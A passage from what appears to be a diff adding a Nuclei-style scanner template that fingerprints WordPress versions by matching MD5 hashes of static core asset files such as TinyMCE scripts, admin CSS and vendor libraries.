"(\"ae3b50794ddcc3df84812d0cbc2855d4\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - 
"(\"48078b35c0f544d16d7555da33ed6452\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"7d0ceb00ca46b627c036f834c7edd58a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.11 + dsl: + - "(\"5318022592bd8ec613a3ec32e68d47e9\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"e0e239a4e8242880ed2d964e7a299579\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.15 + dsl: + - "(\"ce9cca5e1367cd6f5d4471f5604a4d69\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.29 + dsl: + - "(\"474111b726b62007e9b5601b8d2f81bf\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.18 + dsl: + - "(\"1ca4d589307f12d1cb208a33e539ed23\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.32 + dsl: + - "(\"3d2de6e6f70baf2d755cdc9c153474f0\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.18 + dsl: + - "(\"7d6840b991b131e9d5469c4b3fa912ba\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.32 + dsl: + - "(\"a41d935025d74367609f773af6e31702\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.19 + dsl: + - "(\"5bae92ed3e8c6ee6ea8cc4e9c51efe27\" == md5(body))" + - type: dsl + name: 3.9.20 - 3.9.33 + dsl: + - "(\"67e7be5e708bcfc2f2d3cd31ed6f4c9c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.21 + dsl: + - "(\"aa873353bbf46d2bcee1cc0ae2e9ebd0\" == md5(body))" + - type: dsl + name: 3.8.22 - 3.8.33 + dsl: + - "(\"a80a3c351b5307e73a9efa09e35f378f\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.21 + dsl: + - "(\"c9d7f5943044ff3a3a341c077ae58a42\" == md5(body))" + - type: dsl + name: 3.7.22 - 3.7.33 + dsl: + - "(\"d9e99f88c210e4e9b1ef2a508305705a\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"eb662536068707c335019d38236b441c\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e532ee2cba4f82923a406d04a69827f2\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"caec3c62a9d482aea3a07473ba2fc765\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"e4c3fca615d78a5b856fa3ebbb4c676c\" == md5(body))" + - type: dsl + name: 
5.3 - 5.3.6 + dsl: + - "(\"067b1858667ec737ba52026e37c22f77\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f8a60311599ef36778d88259b9f3e9d2\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"b8124af933079872677671b4a77c8fe8\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"ddbfbec2edb0270430e1546d0df08fa6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-background.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.7 + dsl: + - "(\"351f2eef1d5033d68e8982ea86167e3f\" == md5(body))" + - type: dsl + name: 3.7.34 - 4.6.19 + dsl: + - "(\"82d07f23593e578820b19fc9faad65a0\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"c0a9906e080e0d00b148d2353b5d6863\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"2efa9ea39be6f21776bf7ce5c28a094b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"5442cfbbb1ab1df7b84357bed44a6d10\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.1 + dsl: + - "(\"722661f3c458461e17f42ccb91d6d951\" == md5(body))" + - type: dsl + name: 5.4.3 - 5.6 + dsl: + - "(\"d9683ebc4fbcb974777935504c5b9680\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"ba771cf596a7fd154c43ea99e94b5083\" == md5(body))" + - type: dsl + name: 4.7.19 - 5.2.9 + dsl: + - "(\"1a4848edc676cde4a347a6a1ef1477cd\" == md5(body))" + - type: dsl + name: 3.7.35 - 4.6.20 + dsl: + - "(\"b8dab1edb309a4b7e21dead64991eaa5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-gallery.min.js" + matchers: + - type: dsl + name: 3.7 - 5.2.7 + dsl: + - "(\"3296d1fa20d292b002bba10490f1ba6e\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"75e959d883beb502e661572dd86d84f3\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"53b0f902ba530b9ebfc3716ff006c8a4\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.1 + dsl: + - "(\"6aa020f29b4e78387028621dc2a1e987\" == md5(body))" + - type: dsl + name: 5.4.3 - 5.6 + dsl: 
+ - "(\"aac04f629735f75726bbc0ea482c7884\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"1b6e81c7b603c050ecba93b522283460\" == md5(body))" + - type: dsl + name: 3.7.35 - 5.2.9 + dsl: + - "(\"1dcf2019c086d731dc3793a0c5afb7b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/inlite/theme.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"bf1d945945d6748aad3efed41f3f12ef\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"072d29e6b3b22ef87ec8af8a3a79b924\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"cc88f336999397d383b5fa434294a258\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"9e675131dcae21250f65f02d43c3b73b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"6c33490636e4a429f5388481fdc21921\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"c5e532252df4da20a8fc47f2398ae693\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"68c854763f6bd132b1cc20f6e0d1e970\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"9cba2d62377b91304375c96226eba843\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"ebd38a888450ac2bffe8115c8db03481\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"7b481194bebb48661b83a258e3ff090e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e25a3d100d6f3c33a4a145d0ed1e16c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/inlite/theme.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9176de33c606c8c9b43fe11ecf01439f\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"ff6758c8f83385d2e839e15e12463720\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"fb14698a360d5a3d7857397104fc556c\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"11a18378a9afa362204054b59b618b16\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + 
dsl: + - "(\"0708be140b906ad238f8080afd1fd280\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"45eb0273b92eb8cd42cf66d44e2492fb\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"1fb22dab6ed32deabfed237aad759e24\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"77930c82ebe7bc5fb285ef8145e95c9d\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"e41a93fa397a59a3805d4271592a6d40\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"f51c77b5905ab12e3ef9c3c2259afcc3\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"344f1ce0e24412496360e1181995454a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/lists/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"20e9f3b6a4a72b77a6d2c5679542dff6\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"c9262830210151ba3773c4ad358067ac\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"c5646744ede702b668fb314569b37a51\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"00cb28ee11a26c67b2e1092341f6f667\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e3242c88652b5f2bb64d04bd32672ef1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"65001a3642b354f8a1ac6b71c832ecda\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"6bdcee3180998f7f8e13dc4917d8f9a9\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"279a5b0bf93f8d81288dfbd117b6c77c\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"826477563d7d3beb97e98c65259436be\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"9c7b5c4ee1505c256faaaa7fe64b4dfd\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"2c8d42c1cf6305ee4da6c9a8f1ae3a5a\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"f22019286074a87a7191766c89c4cfab\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 
+ dsl: + - "(\"5d19da0a2153ae26cff3c6263d0e2b89\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"aac38cc02ba368de90157c29049151a3\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"1d6d5af175dd06021d60cf5d02856c67\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"32b438beb73a7396a577bc39e74a8fa3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"7c74a0f866c5dfd1dc9a45474651f6ef\" == md5(body))" + - type: dsl + name: 4.1 - 4.5.23 + dsl: + - "(\"1d8eb51f53f479c82c6c660f7f40ad40\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"35e463dbb829b4142c4baf52693035a0\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"80fca05c0bb63230df94b9868cc5fd30\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7a89e68c14d7d560251a55cdd2717047\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"cc93057ecab25b3d7ea1385cf9475654\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.8.35 + dsl: + - "(\"226e874723ff74a09b8ce66eacbaefbe\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3c2d355486c2165d31202b840ac78597\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/lodash.min.js" + matchers: + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"62acde2a2687c63954bee264a1a2f86d\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"bc0594c54450e8ac689739b6b198067a\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"913a2917447f6e4243fc9ffe398ad00e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/lodash.js" + matchers: + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"07ec8c63dfd89bcdb33f8bd14f4f8db8\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"050c900c28ad5d8275ff56f63b05becb\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - 
"(\"326ebe421b32d7cfe7015d83e7f7208e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"34800de78944cc6cf21ac3c61cd7df03\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"e506e7cb42244f39a47e21f4eada7421\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"5981cc4115225a71e097cef30b55df71\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3745d97e3f5618ffd6ac8e7f916fca42\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6926951583064a4532a7819f624c7756\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"686c7af3cc4a1474646963751a4a5a7e\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"7d2ef4bb244bac8a81d13ef4382d168e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5090bae2c114802440412e301bdf5174\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"4e0b29837fad1438a92fd0f27c43db68\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"07cb8d19850cdf59cd8aa2ba8d3ecca8\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"9651c10838a77fb4cca900b47d9d331c\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"35b20a1298ab637a58ac70fa73df335c\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"5b10ce987c2e7a6ccb8f2e8e197dd5ac\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"564275703d82fa3ba9b199743730c06b\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"e438b17739e7dea20da625c54590c83d\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"9c96643398461b53ec9c5d2085434a2d\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + 
- "(\"67300742f2ebd668e53c3935f4a80964\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.4.4 + dsl: + - "(\"0de56511864c9de2a5cdb878010fc550\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8b026c6f37d6037237397741ac55c945\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/content.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"2f9c65ecc50238c129c9db06f7d1b0de\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"a163c2a2e85d1c363e181b3c57f30d8a\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"a1207b432127ddc0c383acfb711b5a78\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"b7c6c39dbee52e316139d6f41ec805ca\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"6f53d570185a3510ecd0c79b34be53d0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"7a782b3c28c8d32904c8caffe5d764ad\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"3fa0e763ae7456564829fa3e439c46f1\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"9b7df826ce7465aac717f19eca8cfd3b\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"8e445bfdef94a7238354f616c071602a\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.4.4 + dsl: + - "(\"0be8f6d47b7eb85f49cbb5b54feb4b40\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"95a2955c501549fdc9a5d8d83c5c88b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css" + matchers: + - type: dsl + name: 4.6 - 5.4.4 + dsl: + - "(\"e5313168fb2b657a4bd2f5e06b931a22\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"96b3a37270049ad482e5e0b14b2bff89\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"97ddcd95d500418cd2114974ff644812\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"aa77790f42e50f03b4ef956fc37cedd8\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/colors/coffee/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.4.4 + dsl: + - "(\"397e3820b27a234330c95e05250f61ce\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"e78e27aed68950c946a06a541ffa4ba7\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"215144fe0268ea34a511e791078fe8f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.4.4 + dsl: + - "(\"1a7c5bfd9faf7f6cc77cd9b166062568\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"c52397b9dadfeb85c77059e70dd28b65\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"84b7aaf89eecd756f42a2c5e622a249a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/moment.min.js" + matchers: + - type: dsl + name: 5.0 - 5.4.4 + dsl: + - "(\"8999b8b5d07e9c6077ac5ac6bc942968\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"ab123abdffebc1fbd885949213b13f57\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/moment.js" + matchers: + - type: dsl + name: 5.0 - 5.4.4 + dsl: + - "(\"6722aa945b6577eda74330383105557f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e70a748e7cf42733bf14fa2030bd84ae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"2b5153576d1eee4002fb7ed9e5831251\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"c6d8c11219599e48d32cb3dbefe43d29\" == md5(body))" + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"62151e11b251bdda2295d9a8105e782a\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"e232c49b84f1291a9ce6468bfb114f1a\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"4e8d87c996953d8e9566e682ba348441\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3a314eb02806e8786c018f58ddfcbf27\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-backbone.js" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"ff08a91eba7f4fb95be7d5eb4a072d76\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"fdaba653baf259db7cb3d7a4d76a2970\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"066899e5caeb819e6fa0422c3ce92fbd\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"65105a0048efed09300417b61ad18cc9\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"ba62f36757662e2bb4585c05dedfd070\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"04afd74a8cae5409bbe26cd951cbc231\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/deprecated-media-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"ac5bc02b710e35115cadca960308560c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f6195709d41e1547898d1bd075091a4c\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"11bce99ac6be4fc46b9510278de3365a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"017b6102507494583f9241b9f8854959\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"74413a2404aadd63114f75e93d4e54c3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"385c6e9e75a08fbd280447c4190d7233\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2053b840e7091a03d9212f6eeaceab78\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"76e634724a9a1282e287a4d89da142a1\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"ae51dff82ed4709e6460661d4999aea8\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"f341cc91db43d556d8573cddc05e1ab4\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8952f7183f83e9f988df6cfab381e57d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/deprecated-media.min.css" + matchers: + - type: dsl + name: 
4.6 - 4.8.15 + dsl: + - "(\"b1cc8030eb9a806f2fa3a4aeecdac87c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"553fc5dcdad1a950968fd3889dd0798a\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"3fe617931e6f3e488d120de15875f696\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"625227ce35e802591f85a974db531d36\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"aef5bd3a2b515ab84f6e9fff6a7d4b15\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"c3b492ce52736917c0e7fd620a314036\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"bdf6c67b381490a4ecc8a12e0121b8cb\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"598fe37b999d9392bec5d439430a4447\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"87fe11509d4e425db64abd2e0394d4ef\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"d500c620b7f00683bef8e6b579f621f7\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5c0576d5df98fe54a147c7a9682b3735\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/_variables.scss" + matchers: + - type: dsl + name: 4.2 - 5.1.8 + dsl: + - "(\"3ab501096b1a091972d84c85b284135a\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"769f771a3f3fdb68e59c9c71b0a7baab\" == md5(body))" + - type: dsl + name: 5.2 - 5.3 + dsl: + - "(\"719b571cacd7a1e140377a7a3ecf8cd4\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"7cc967183c11b5c46e0cb2a83132fe9a\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d590e45d50e3cc8d6698e9566bff6bc9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/clipboard.js" + matchers: + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"945fc983fe7bb6fbf3d3ad76f5246b11\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d49273842035439fc99acc628cd64c46\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/fonts/dashicons.woff2" + matchers: + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"e3ce3e0415834a28cb23ac40d5ef1acc\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4db6aca14e3ac2d227e5caa4b7dbc8b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/nav-menu.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"2975b2cb1f865538da0f7056f3f267f5\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f5ae9e78b47c5096b10afeb0e1e951e5\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"2018071a5a024a8a8c56f793c415e4c1\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"f0b45151e04c6dc6061556c6e889431d\" == md5(body))" + - type: dsl + name: 4.2.4 - 4.2.29 + dsl: + - "(\"e4fc225947f25daa1cc8e153caabf98a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.3 + dsl: + - "(\"d6facb8a8fe8d2ed1cdef140d006942a\" == md5(body))" + - type: dsl + name: 4.0.2 - 4.1.32 + dsl: + - "(\"c80084b98b0ee2a45e17dd3eef229d8d\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.1 + dsl: + - "(\"1ac435f167ec9c539cf405e139fc9a45\" == md5(body))" + - type: dsl + name: 3.8.6 - 3.9.33 + dsl: + - "(\"44f78808e404a41a0335959ae3e71d4c\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.3 + dsl: + - "(\"d1511ebb0763771ef8704b71a1abf1f0\" == md5(body))" + - type: dsl + name: 3.7.6 - 3.7.35 + dsl: + - "(\"2c6d5b682afadc134de7b46b1d201141\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.5 + dsl: + - "(\"a784f15f81f5a7dfdeda227d1ae8bd02\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"6b451d41fb408bf92f39a2c86b2fc544\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"c9058b907f0a2b1a81885047ef33660c\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"7b471a387caf8b12d1f852c1b8bc9164\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"2163970d52136c60d14dd9e2a911bdad\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - 
"(\"99dc2904606935a86b4e09f2fccd3158\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"404825b185b9d372a012af2d0522c4cc\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4ebe903cffb8b10b75569a121e899b53\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"ec9f05e576f73e06177bfbce15ae9747\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"1495197fcb73221ecc07015adb0f97a6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"32237fd4dbc69f6bbf3b7f7496cc674f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ef806de6ca6f1220a40137423a090d32\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"88ebb8aaac396aa64835549f8812141b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/handlers.js" + matchers: + - type: dsl + name: 4.6.6 - 5.2.9 + dsl: + - "(\"7a8494f68ff136d5bf92a075fa61dfe0\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.4 + dsl: + - "(\"06e4d64e099466eaa3185f1850884821\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.5.23 + dsl: + - "(\"0f6712d2c464a0d1004730a681d535b1\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.8 + dsl: + - "(\"c9d857501549cabf90a9c546f0556729\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.17 + dsl: + - "(\"9798444b97233bb341b19f374f85c11c\" == md5(body))" + - type: dsl + name: 3.9.19 - 4.1.32 + dsl: + - "(\"e7ba5e91add4b63a869cfc89fba4e450\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.20 + dsl: + - "(\"d39498ac697640f306f8a37ac4f9ac30\" == md5(body))" + - type: dsl + name: 3.8.21 - 3.8.35 + dsl: + - "(\"224c433a1b7108849dabd9c4b28a5820\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.7.20 + dsl: + - "(\"878e0b76338a31dd288a1ed089cb6a4f\" == md5(body))" + - type: dsl + name: 3.7.21 - 3.7.35 + dsl: 